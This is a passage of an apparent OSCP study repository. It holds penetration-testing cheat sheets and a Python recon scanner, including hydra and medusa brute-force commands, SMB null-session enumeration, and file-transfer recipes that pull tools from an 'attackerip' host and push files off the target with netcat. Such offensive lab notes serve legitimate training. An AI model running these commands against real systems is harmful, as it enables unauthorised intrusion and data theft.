├── Crack
├── Enum-Scanning
│   ├── .DS_Store
│   ├── README.md
│   ├── recon_enum
│   │   └── reconscan.py
│   ├── reports
│   │   └── reports.txt
│   └── setup.sh
├── Enumeration
├── Exploit
├── File Transfers - Linux
├── File Transfers - Windows
├── Priv Esc - Linux
├── Priv Esc - Windows
├── Readme.md
├── Reporting-Templates
│   ├── .DS_Store
│   ├── linux-template.md
│   └── windows-template.md
├── SQL
├── Scripts - MS08-067
├── Scripts - SMB
├── Scripts - Windows File Upload Using PS (without nc.exe)
├── Shells
├── Web
├── Websites
│   ├── .DS_Store
│   ├── Basic Linux Privilege Escalation.webloc
│   ├── Manifesto - ScriptDotSh.webloc
│   ├── OSCP & Cyber Stuff - Dropbox.webloc
│   ├── Offensive Security Student Support.webloc
│   ├── PGP Decrypt, Remove whitespace - CyberChef.webloc
│   ├── SU-Courses:CIS643-ComputerSecutiry:References at master · Ider:SU-Courses.webloc
│   ├── Welcome [Root Me - Hacking and Information Security learning platform].webloc
│   └── netsecstudents- Subreddit for students studying Network Security and its related subjects.webloc
├── eBooks-Links
│   ├── Introduction · Security - My notepad.webloc
│   └── OWASP Testing Guide.pdf
└── tmux
    ├── How do I scroll in tmux? - Super User.webloc
    ├── tmux copy paste with mouse | Awhan Patnaik.webloc
    ├── tmux shortcuts & cheatsheet · GitHub.webloc
    └── tmux.conf

--------------------------------------------------------------------------------
/Crack:
--------------------------------------------------------------------------------
Cewl

cewl http://<target>/ -m 6 -w cewl.txt
wc -l cewl.txt
john --wordlist=cewl.txt --rules --stdout > mutated.txt
wc mutated.txt
medusa -h <ip> -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30

-----------------------------------

Hydra

hydra -l root -P /usr/share/wordlists/rockyou.txt <ip> ssh
hydra -L userlist.txt -P /usr/share/wordlists/rockyou.txt -s 22 <ip> ssh -V

# crack web passwords
# the http-post-form string changes as the login form changes
# "Invalid" is the message the page returns for wrong creds
# check the parameter names with burp

hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt <ip> http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

-----------------------------------

Medusa

medusa -h <ip> -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10

-----------------------------------

Hashcat

# learn the hash type from the hashcat.net example-hashes page and pass it as the -m value
# or look it up with the following command
hashcat -h | grep -i lm
hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt

-----------------------------------

LM/NTLM

hashcat -h | grep -i lm
# hashcat takes the wordlist as a positional argument and rules via -r (it has no --rules/--wordlist options; those are john's)
hashcat -m 3000 hashes /usr/share/wordlists/rockyou.txt -r <rules file>

https://hashkiller.co.uk/

------------------------------------------

When you find some digits, check whether it is 32 characters long (wc -c counts bytes):
echo -n ....... | wc -c

------------------------------------------

John

john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt

--------------------------------------------------------------------------------
/Enum-Scanning/README.md:
--------------------------------------------------------------------------------
# oscp

## Reconscan.py

This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/), but it has been heavily rewritten: some things have been added, other things removed. The script was written as preparation for the OSCP exam and was never meant to be a general-purpose script, so if you want to use it you have to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once.

The script is invoked like this:

```
python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103
```

One important thing to note is that I removed the scan for all ports, because it would sometimes take too long to run. So make sure you either add that scan back or run it afterwards, so you don't miss any ports.

Please note that the script includes dirb and nikto scans that are very invasive. The script also includes several nmap scripts that check for vulnerabilities. So this script would be pretty illegal and bad to run against a machine you don't have permission to attack.

## Templates

I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for Windows.
There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**.

The templates are written in markdown, but I never actually rendered them, so I don't really know what they look like rendered. They are probably pretty messy. I also used them together with markdown syntax highlighting in my editor, which made it easy to navigate the files.

The templates have a few keywords in them, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, which inserts the target machine's IP address automatically. Some other things are also inserted automatically, like a basic nmap scan and the nikto scan.

Wherever there are references to a book, this is the book: https://bobloblaw.gitbooks.io/security/content/

--------------------------------------------------------------------------------
/Enum-Scanning/recon_enum/reconscan.py:
--------------------------------------------------------------------------------
#!/usr/bin/env python
# Python 2 script (print statements, str-based socket I/O).
import subprocess
import multiprocessing
import os
import shutil
import time
import sys
import socket
import re

# Todo:
# Add mysql nmap-script

start = time.time()

class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'

# Hooks in the report templates (see README) that write_to_file() replaces with scan output.
MARKERS = {
    "portscan": "INSERTTCPSCAN",
    "dirb": "INSERTDIRBSCAN",
    "nikto": "INSERTNIKTOSCAN",
    "ftp-connect": "INSERTFTPTEST",
    "smtp-connect": "INSERTSMTPCONNECT",
    "ssh-connect": "INSERTSSHCONNECT",
    "pop3-connect": "INSERTPOP3CONNECT",
    "curl": "INSERTCURLHEADER",
}

# nmap http-* scripts shared by the http and https enumeration
HTTP_SCRIPTS = ("http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,"
                "http-config-backup,http-default-accounts,http-methods,http-method-tamper,"
                "http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,"
                "http-git,http-iis-webdav-vuln,http-php-version,http-shellshock,"
                "http-vuln-cve2015-1635")


# Runs targetin(scanip, port) in its own process so several scans run at once.
def multProc(targetin, scanip, port):
    p = multiprocessing.Process(target=targetin, args=(scanip, port))
    p.start()
    return


# Grabs the service banner and, for ftp and pop3, the replies to a default login attempt.
def connect_to_port(ip_address, port, service):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(10)   # don't hang the whole enumeration on a silent service
    try:
        s.connect((ip_address, int(port)))
        banner = s.recv(1024)

        if service == "ftp":
            s.send("USER anonymous\r\n")
            user = s.recv(1024)
            s.send("PASS anonymous\r\n")
            password = s.recv(1024)
            total_communication = banner + "\r\n" + user + "\r\n" + password
            write_to_file(ip_address, "ftp-connect", total_communication)
        elif service == "smtp":
            total_communication = banner + "\r\n"
            write_to_file(ip_address, "smtp-connect", total_communication)
        elif service == "ssh":
            total_communication = banner
            write_to_file(ip_address, "ssh-connect", total_communication)
        elif service == "pop3":
            s.send("USER root\r\n")
            user = s.recv(1024)
            s.send("PASS root\r\n")
            password = s.recv(1024)
            total_communication = banner + user + password
            write_to_file(ip_address, "pop3-connect", total_communication)
    except socket.error as e:
        print bcolors.WARNING + "WARN: " + service + " banner grab failed for " + ip_address + ":" + str(port) + ": " + str(e) + bcolors.ENDC
    finally:
        s.close()


# Replaces the marker for enum_type with the scan output in both report templates.
# The replacement is done in Python rather than by passing `data` to a shell command,
# so output returned by a target is never interpreted by the local shell.
def write_to_file(ip_address, enum_type, data):
    file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address)
    file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address)
    paths = [file_path_linux, file_path_windows]
    print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC

    marker = MARKERS[enum_type]
    for path in paths:
        with open(path) as f:
            content = f.read()
        with open(path, "w") as f:
            f.write(content.replace(marker, data))
    return


# dirb takes several wordlists as one comma-separated argument (no spaces).
def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlists/dirb/big.txt,/usr/share/wordlists/dirb/vulns/cgis.txt"):
    print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC
    DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s-%s.txt -r" % (url_start, ip_address, port, wordlist, ip_address, ip_address, port)
    print bcolors.HEADER + DIRBSCAN + bcolors.ENDC
    results_dirb = subprocess.check_output(DIRBSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC
    print results_dirb
    write_to_file(ip_address, "dirb", results_dirb)
    return


def nikto(ip_address, port, url_start):
    print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC
    NIKTOSCAN = "nikto -h %s://%s:%s -o ../reports/%s/nikto-%s-%s-%s.txt" % (url_start, ip_address, port, ip_address, url_start, ip_address, port)
    print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC
    results_nikto = subprocess.check_output(NIKTOSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC
    print results_nikto
    write_to_file(ip_address, "nikto", results_nikto)
    return


def httpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC

    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "http"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "http"))
    nikto_process.start()

    CURLSCAN = "curl -I http://%s:%s" % (ip_address, port)
    print bcolors.HEADER + CURLSCAN + bcolors.ENDC
    curl_results = subprocess.check_output(CURLSCAN, shell=True)
    write_to_file(ip_address, "curl", curl_results)

    HTTPSCAN = "nmap -sV -Pn -p %s --script=%s -oN ../reports/%s/%s_http_%s.nmap %s" % (port, HTTP_SCRIPTS, ip_address, ip_address, port, ip_address)
    print bcolors.HEADER + HTTPSCAN + bcolors.ENDC
    http_results = subprocess.check_output(HTTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC
    print http_results
    return


def httpsEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC

    dirb_process = multiprocessing.Process(target=dirb, args=(ip_address, port, "https"))
    dirb_process.start()
    nikto_process = multiprocessing.Process(target=nikto, args=(ip_address, port, "https"))
    nikto_process.start()

    SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s_%s" % (ip_address, port, ip_address, ip_address, port)
    print bcolors.HEADER + SSLSCAN + bcolors.ENDC
    subprocess.check_output(SSLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC

    HTTPSCANS = "nmap -sV -Pn -p %s --script=%s -oN ../reports/%s/%s_https_%s.nmap %s" % (port, HTTP_SCRIPTS, ip_address, ip_address, port, ip_address)
    print bcolors.HEADER + HTTPSCANS + bcolors.ENDC
    https_results = subprocess.check_output(HTTPSCANS, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC
    print https_results
    return


def mssqlEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC
    print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC
    MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC
    mssql_results = subprocess.check_output(MSSQLSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC
    print mssql_results
    return


def smtpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "smtp")
    SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SMTPSCAN + bcolors.ENDC
    smtp_results = subprocess.check_output(SMTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC
    print smtp_results
    return


def smbNmap(ip_address, port):
    print bcolors.HEADER + "INFO: Detected SMB on " + ip_address + ":" + port + bcolors.ENDC
    SMBSCAN = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + SMBSCAN + bcolors.ENDC
    smbNmap_results = subprocess.check_output(SMBSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC
    print smbNmap_results
    return


def smbEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected SMB on " + ip_address + ":" + port + bcolors.ENDC
    enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + enum4linux + bcolors.ENDC
    subprocess.check_output(enum4linux, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX scan for " + ip_address + bcolors.ENDC
    return


def ftpEnum(ip_address, port):
    print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ftp")
    FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + FTPSCAN + bcolors.ENDC
    results_ftp = subprocess.check_output(FTPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ftp
    return


# -sU (and the -O run in nmapScan) need root privileges.
def udpScan(ip_address):
    print bcolors.HEADER + "INFO: Starting UDP scans for " + ip_address + bcolors.ENDC
    UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + UDPSCAN + bcolors.ENDC
    udpscan_results = subprocess.check_output(UDPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC
    print udpscan_results
    UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + UNICORNSCAN + bcolors.ENDC
    subprocess.check_output(UNICORNSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC
    return


def sshScan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "ssh")
    SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + SSHSCAN + bcolors.ENDC
    results_ssh = subprocess.check_output(SSHSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_ssh
    return


def pop3Scan(ip_address, port):
    print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC
    connect_to_port(ip_address, port, "pop3")
    POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address)
    print bcolors.HEADER + POP3SCAN + bcolors.ENDC
    results_pop3 = subprocess.check_output(POP3SCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC
    print results_pop3
    return


def nmapScan(ip_address):
    ip_address = ip_address.strip()
    print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC

    TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address)
    print bcolors.HEADER + TCPSCAN + bcolors.ENDC
    results = subprocess.check_output(TCPSCAN, shell=True)
    print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC
    print results

    udp_process = multiprocessing.Process(target=udpScan, args=(ip_address,))
    udp_process.start()

    write_to_file(ip_address, "portscan", results)

    # Build {service: [port/proto, ...]} from the open-port rows, e.g.
    # "80/tcp   open  http    Apache httpd 2.2.8 ((Ubuntu) DAV/2)"
    serv_dict = {}
    for line in results.split("\n"):
        line = line.strip()
        if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
            linesplit = line.split()          # split() collapses runs of whitespace
            if len(linesplit) < 3:
                continue
            port = linesplit[0]               # port/proto
            service = linesplit[2]            # service name
            serv_dict.setdefault(service, []).append(port)

    # go through the service dictionary to call additional targeted enumeration functions
    for serv in serv_dict:
        ports = [proto_port.split("/")[0] for proto_port in serv_dict[serv]]
        if re.search(r"^http(?!s)", serv):        # http, http-alt, http-proxy; not https
            for port in ports:
                multProc(httpEnum, ip_address, port)
        elif re.search(r"https|ssl", serv):       # https, ssl/http
            for port in ports:
                multProc(httpsEnum, ip_address, port)
        elif "smtp" in serv:
            for port in ports:
                multProc(smtpEnum, ip_address, port)
        elif "ftp" in serv:
            for port in ports:
                multProc(ftpEnum, ip_address, port)
        elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv):
            for port in ports:
                multProc(smbEnum, ip_address, port)
                multProc(smbNmap, ip_address, port)
        elif "ms-sql" in serv:
            for port in ports:
                multProc(mssqlEnum, ip_address, port)
        elif "ssh" in serv:
            for port in ports:
                multProc(sshScan, ip_address, port)
        elif "pop3" in serv:
            for port in ports:
                multProc(pop3Scan, ip_address, port)
        # snmp: no snmpEnum() exists in this script; UDP services are covered by udpScan()
    return


if __name__ == '__main__':
    print bcolors.HEADER
    print "------------------------------------------------------------"
    print "!!!!            RECON SCAN                              !!!!!"
    print "!!!!  A multi-process service scanner                   !!!!!"
    print "!!!!  dirb, nikto, ftp, ssh, mssql, pop3, tcp           !!!!!"
    print "!!!!  udp, smtp, smb                                    !!!!!"
    print "------------------------------------------------------------"

    if len(sys.argv) < 2:
        print ""
        print "Usage: python reconscan.py <ip> [<ip> ...]"
        print "Example: python reconscan.py 192.168.1.101 192.168.1.102"
        print ""
        print "############################################################"
        sys.exit()

    print bcolors.ENDC

    # Setting ip targets
    targets = sys.argv[1:]

    dirs = os.listdir("../reports/")
    for scanip in targets:
        scanip = scanip.rstrip()
        report_dir = "../reports/" + scanip
        if scanip not in dirs:
            print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC
            os.makedirs(report_dir + "/exploits")
            os.makedirs(report_dir + "/privesc")
            print bcolors.OKGREEN + "INFO: Folder created here: " + report_dir + bcolors.ENDC
            shutil.copy("../templates/windows-template.md", report_dir + "/mapping-windows.md")
            shutil.copy("../templates/linux-template.md", report_dir + "/mapping-linux.md")
            print bcolors.OKGREEN + "INFO: Added pentesting templates: " + report_dir + bcolors.ENDC
            # fill in the INSERTIPADDRESS hook of both templates
            for template in ("mapping-windows.md", "mapping-linux.md"):
                path = report_dir + "/" + template
                with open(path) as f:
                    content = f.read()
                with open(path, "w") as f:
                    f.write(content.replace("INSERTIPADDRESS", scanip))

        p = multiprocessing.Process(target=nmapScan, args=(scanip,))
        p.start()
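The service-dispatch step of reconscan.py (nmapScan parses the `-oN` output into a service-to-ports dictionary and picks one enumeration function per service) as an added, stand-alone Python 3 example; this is not code from the repository. The nmap output is a constructed sample, and the patterns mirror the script's if/elif checks, with the http pattern written as a negative lookahead so that the bare service name `http` matches (a pattern such as `http[^s]` requires a following character and misses it).

```python
import re

# Constructed sample of `nmap -sV -O` normal output (not a real scan result).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-01 12:00 UTC
Nmap scan report for 192.168.1.101
Host is up (0.00042s latency).
Not shown: 991 closed ports
PORT     STATE    SERVICE      VERSION
21/tcp   open     ftp          vsftpd 2.3.4
22/tcp   open     ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
25/tcp   open     smtp         Postfix smtpd
80/tcp   open     http         Apache httpd 2.2.8 ((Ubuntu) DAV/2)
139/tcp  open     netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp  open     ssl/http     Apache httpd 2.2.8 ((Ubuntu) DAV/2)
445/tcp  open     netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
1433/tcp filtered ms-sql-s
8080/tcp open     http-proxy   Squid http proxy 3.1.19
Discovered open port 8443/tcp on 192.168.1.101
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One "<port>/<proto> <state> <service> ..." row of nmap's port table.
PORT_ROW_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")

# Enumeration modules in the order reconscan.py's nmapScan() tests them; the first
# match wins, so "ssl/http" reaches the https branch and "http-proxy" the http one.
DISPATCH = [
    ("http",  re.compile(r"^http(?!s)")),       # http, http-alt, http-proxy; not https
    ("https", re.compile(r"https|ssl")),
    ("smtp",  re.compile(r"smtp")),
    ("ftp",   re.compile(r"ftp")),
    ("smb",   re.compile(r"^(microsoft-ds|netbios-ssn)$")),
    ("mssql", re.compile(r"ms-sql")),
    ("ssh",   re.compile(r"ssh")),
    ("pop3",  re.compile(r"pop3")),
]


def parse_open_tcp_services(nmap_output):
    """Return {service: [port, ...]} for every open TCP port in nmap normal output.

    Only rows of the port table are considered, so verbose "Discovered open port"
    lines are ignored, and only state "open" counts (not filtered/closed).
    """
    services = {}
    for line in nmap_output.splitlines():
        m = PORT_ROW_RE.match(line.strip())
        if not m or m.group("proto") != "tcp" or m.group("state") != "open":
            continue
        services.setdefault(m.group("service"), []).append(int(m.group("port")))
    return services


def plan_enumeration(services):
    """Return the (module, port) pairs the per-service enumeration would run."""
    plan = []
    for service, ports in services.items():
        for module, pattern in DISPATCH:
            if pattern.search(service):
                plan.extend((module, port) for port in ports)
                break   # first matching module only, like the if/elif chain
    return plan


if __name__ == "__main__":
    found = parse_open_tcp_services(SAMPLE_NMAP_OUTPUT)
    for module, port in sorted(plan_enumeration(found), key=lambda x: x[1]):
        print("%-5s -> port %d" % (module, port))
```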
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Enum-Scanning/reports/reports.txt -------------------------------------------------------------------------------- /Enum-Scanning/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null) 4 | echo -e '#!/bin/bash\n' > /usr/bin/reconscan 5 | echo -e "cd $folder && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan 6 | chmod +x /usr/bin/reconscan 7 | 8 | -------------------------------------------------------------------------------- /Enumeration: -------------------------------------------------------------------------------- 1 | NMAP 2 | 3 | # Alive hosts 4 | nmap -sn 10.0.0.0/24 5 | 6 | # scan the 1024 most common ports, run OS detection, run default nmap scripts 7 | nmap -A -oA nmap 8 | 9 | # Scan more deeply, scan all 65535 ports on $targetip with a full connect scan 10 | nmap -v -sT -p- 11 | 12 | # more options 13 | nmap -sV -sC -v -A -p- 14 | nmap -sT -sV -A -O -v -p 1–65535 15 | 16 | # my preference 17 | nmap -sV -sC -v -oA output 18 | nmap -p- -v 19 | 20 | 21 | ------------------------ 22 | 23 | SMB 24 | 25 | Port 139 and 445- SMB/Samba shares 26 | Samba is a service that enables the user to share files with other machines 27 | works the same as a command line FTP client, may browse files without even having credentials 28 | 29 | # Share List: 30 | smbclient --list 31 | smbclient -L 32 | 33 | # Check SMB vulnerabilities: 34 | nmap --script=smb-check-vulns.nse -p445 35 | 36 | # basic nmap scripts to enumerate shares and OS discovery 37 | nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse 38 | 39 | # Connect using Username 40 | root@kali:~# smbclient -L -U username -p 445 41 | 42 | # 
Connect to Shares 43 | smbclient \\\\\\ShareName 44 | smbclient \\\\\\ShareName -U john 45 | 46 | # enumarete with smb-shares, -a “do everything” option 47 | enum4linux -a 192.168.1.120 48 | 49 | # learn the machine name and then enumerate with smbclient 50 | nmblookup -A 192.168.1.102 51 | smbclient -L -I 192.168.1.105 52 | 53 | # rpcclient - Connect with a null-session (only works for older windows servers) 54 | rpcclient -U james 10.10.10.52 55 | rpcclient -U "" 192.168.1.105 56 | (press enter if asks for a password) 57 | rpcclient $> srvinfo 58 | rpcclient $> enumdomusers 59 | rpcclient $> enumalsgroups domain 60 | rpcclient $> lookupnames administrators 61 | rpcclient> querydominfo 62 | rpcclient> enumdomusers 63 | rpcclient> queryuser john 64 | 65 | # scan for vulnerabilities with nmap 66 | nmap --script "vuln" -p139,445 67 | 68 | ------------------------ 69 | 70 | SMTP 71 | 72 | # telnet or netcat connection 73 | nc 25 74 | VRFY root 75 | # Check for commands 76 | nmap -script smtp-commands.nse 77 | 78 | ------------------------ 79 | 80 | Port 111 - RPC 81 | 82 | Rpcbind can help us look for NFS-shares. So look out for nfs. 
Obtain list of services running with RPC: 83 | 84 | rpcbind -p 85 | rpcinfo –p x.x.x.x 86 | 87 | # using nmap, see which port NFS is listening 88 | locate *rpc*.nse 89 | nmap --script rpcinfo.nse -p 111 90 | 91 | ------------------------- 92 | 93 | NFS 94 | 95 | # to find the public share 96 | locate *nfs*.nse 97 | nmap --script nfs-showmount.nse 98 | 99 | # mount the share to a folder under /tmp 100 | mkdir /tmp/nfs 101 | /sbin/mount.nfs :/home/box /tmp/nfs 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /Exploit: -------------------------------------------------------------------------------- 1 | Searchsploit 2 | # To view the file 3 | searchsploit -x php/webapps/41564.c 4 | 5 | # To see the full path of the file 6 | searchsploit -p php/webapps/41564.c 7 | -------------------------------------------------------------------------------- /File Transfers - Linux: -------------------------------------------------------------------------------- 1 | Python SimpleHTTPServer 2 | 3 | #on Attacker 4 | python -m SimpleHTTPServer 5 | 6 | #on target 7 | wget :8000/filename 8 | 9 | 10 | ------------------------------ 11 | 12 | Apache 13 | 14 | #on Attacker 15 | cp filetosend.txt /var/www/html 16 | service apache2 start 17 | 18 | #on target 19 | wget http://attackerip/file 20 | curl http://attackerip/file > file 21 | fetch http://attackerip/file # on BSD 22 | 23 | ---------------------------------- 24 | 25 | Netcat (From Target to Kali) 26 | 27 | # Listen on Kali 28 | nc -lvp 4444 > file 29 | 30 | # Send from Target machine 31 | nc 4444 < file 32 | 33 | ----------------- 34 | 35 | 36 | Netcat (From Kali to Target) 37 | 38 | # on target, wait for the file 39 | nc -nvlp 55555 > file 40 | 41 | # on kali, push the file 42 | nc $victimip 55555 < file 43 | 44 | 45 | ---------------------- 46 | 47 | Extra: 48 | To send the executable file to your machine: 49 | 50 | base64 executable 51 | # 
copy the output 52 | # paste it in a file called file.txt 53 | # decode it and create the executable 54 | base64 -d file.txt > executable 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /File Transfers - Windows: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------- 3 | TFTP 4 | # Windows XP and Win 2003 contain tftp client. Windows 7 do not by default 5 | # tfpt clients are usually non-interactive, so they could work through an obtained shell 6 | 7 | atftpd --daemon --port 69 /tftp 8 | Windows> tftp -i 192.168.30.45 GET nc.exe 9 | 10 | -------------------------------------- 11 | 12 | FTP (pyftpdlib client on Kali) 13 | # Ftp is generally installed on Windows machines 14 | # To make it interactive, use -s option 15 | 16 | # On Kali install a ftp client and set a username/password 17 | apt-get install python-pyftpdlib 18 | python -m pyftpdlib -p 21 19 | 20 | # on Windows 21 | ftp 22 | > binary 23 | > get exploit.exe 24 | 25 | ------------------------------------------- 26 | 27 | FTP (pureftpd client on Kali) 28 | 29 | # on Kali 30 | 31 | # install ftp client 32 | apt-get install pure-ftpd 33 | # create a group 34 | groupadd ftpgroup 35 | # add a user 36 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser 37 | # Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob). 38 | mkdir /root/ftphome 39 | # Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish). 40 | pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/ 41 | # Update the ftp database after adding our new user. 
pure-pw mkdb
# change ownership of the specified ftp directory (and all its sub-directories)
